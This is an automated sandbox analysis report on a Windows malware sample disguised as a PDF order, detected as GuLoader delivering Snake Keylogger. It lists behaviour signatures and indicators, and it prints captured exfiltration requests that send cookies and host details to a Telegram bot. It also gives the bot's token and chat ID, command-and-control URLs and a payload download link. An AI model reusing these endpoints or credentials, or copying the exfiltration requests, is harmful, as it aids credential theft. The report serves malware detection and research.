Windows Analysis Report
Order requirements CIF Greece_pdf.exe

Overview

General Information

Sample name: Order requirements CIF Greece_pdf.exe
Analysis ID: 1560036
MD5: 998e394361bd54c58a1ad2092fca8b6c
SHA1: c68e7856324a50c04ee5e1de46952ecaed47eff7
SHA256: 87f519d29ebc3fb1b6bed4a5e7ac4865b029da69d2608548a8db34e4069673ec
Tags: exeGuLoaderQuotationuser-cocaman
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Disables CMD prompt
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84", "Chat_id": "6897585916", "Version": "4.4"}
Source: msiexec.exe.8044.6.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendMessage"}
Multi AV Scanner detection for submitted file
Source: Order requirements CIF Greece_pdf.exe ReversingLabs: Detection: 57%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: Order requirements CIF Greece_pdf.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EB300 CryptUnprotectData, 6_2_236EB300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_236EBA61 CryptUnprotectData, 6_2_236EBA61
Uses 32bit PE files
Source: Order requirements CIF Greece_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: Order requirements CIF Greece_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2047558142.0000000008AB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: re.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_00406448 FindFirstFileA,FindClose, 0_2_00406448
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040589C
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe Code function: 0_2_004027A1 FindFirstFileA, 0_2_004027A1
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EBDF0h 6_2_236EBB20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EAA25h 6_2_236EA6E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EFCBEh 6_2_236EF9F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E5E21h 6_2_236E5B78
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E89F1h 6_2_236E8748
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E2A01h 6_2_236E2758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E59C9h 6_2_236E5720
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EE5EEh 6_2_236EE320
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E25A9h 6_2_236E2300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E92A3h 6_2_236E8FF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then mov esp, ebp 6_2_236EDBF9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E6279h 6_2_236E5FD0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E8E49h 6_2_236E8BA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E2E59h 6_2_236E2BB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EEA7Eh 6_2_236EE7B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E5119h 6_2_236E4E70
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E7CE9h 6_2_236E7A40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E1CF9h 6_2_236E1A50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EA0E1h 6_2_236E9E38
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E4CC1h 6_2_236E4A18
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E8599h 6_2_236E82F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E5571h 6_2_236E52C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E2151h 6_2_236E1EA8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E8141h 6_2_236E7E98
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EA539h 6_2_236EA290
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EE15Eh 6_2_236EDE90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E4411h 6_2_236E4168
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EF82Eh 6_2_236EF560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E0FF1h 6_2_236E0D48
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E3FB9h 6_2_236E3D10
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E7891h 6_2_236E75E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E9C89h 6_2_236E99E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E18A1h 6_2_236E15F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E4869h 6_2_236E45C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E1449h 6_2_236E11A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E9831h 6_2_236E9588
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E7439h 6_2_236E7190
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E3709h 6_2_236E3460
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E02E9h 6_2_236E0040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EEF0Eh 6_2_236EEC40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E32B1h 6_2_236E3008
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then mov esp, ebp 6_2_236EDC08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E0B99h 6_2_236E08F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236EF39Eh 6_2_236EF0D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E3B61h 6_2_236E38B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 236E0741h 6_2_236E0498

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b53820095deHost: api.telegram.orgContent-Length: 7045
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 132.226.247.73 132.226.247.73
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.186.78:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 188.114.96.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b53820095deHost: api.telegram.orgContent-Length: 7045
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Nov 2024 09:37:26 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.2042349403.0000000007890000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microl
Source: powershell.exe, 00000001.00000002.2042349403.000000000794B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros6
Source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: Order requirements CIF Greece_pdf.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Order requirements CIF Greece_pdf.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2037160905.0000000005101000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2037160905.0000000005101000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.2957521886.00000000212C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.2957521886.00000000212BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2956435223.0000000020750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2172281229.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/1
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2943801242.0000000000C37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2172281229.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/s
Source: powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
